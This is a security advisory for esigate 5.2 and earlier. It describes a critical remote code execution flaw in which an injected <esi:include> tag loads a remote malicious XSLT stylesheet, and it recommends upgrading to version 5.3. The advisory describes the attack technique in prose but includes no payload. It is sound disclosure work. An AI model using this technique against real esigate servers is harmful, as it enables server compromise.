An attacker can execute code on an esigate instance by injecting a malicious XSLT stylesheet in a backend/provider application. This requires control of the backend/provider
| Who should read this | All esigate admins |
|---|---|
| Impact of vulnerability | Possible Remote Code Execution when an attacker has control of backend/provider application (direct or using another vulnerability in these applications) . |
| Maximum security rating | Critical |
| Recommendation | Upgrade to esigate 5.3 |
| Affected Software | Esigate 5.2 and lower. |
| Reporter | This bug was found by Benoit Côté-Jodoin from GoSecure. |
| CVE Identifier | To be assigned |
ESIGate supports <esi:include> tag along with the stylesheet attribute. This attribute can be a remote XSLT. This feature can allow an attacker to execute code on the remote server. The attack scenario requires the attacker to reflect a <esi:include> tag in any page (Any XSS-like injection point). From this injection point, the include tag will point to any page and to a remote malicious stylesheet.
Update to esigate 5.3.
XSLT processing has been switched to secure mode, preventing advanced extensions to be used. Esigate will display an error is a malicious XSLT stylesheet is used.
No workaround exists other than ensuring that attacker cannot inject html tags into backend/provider application.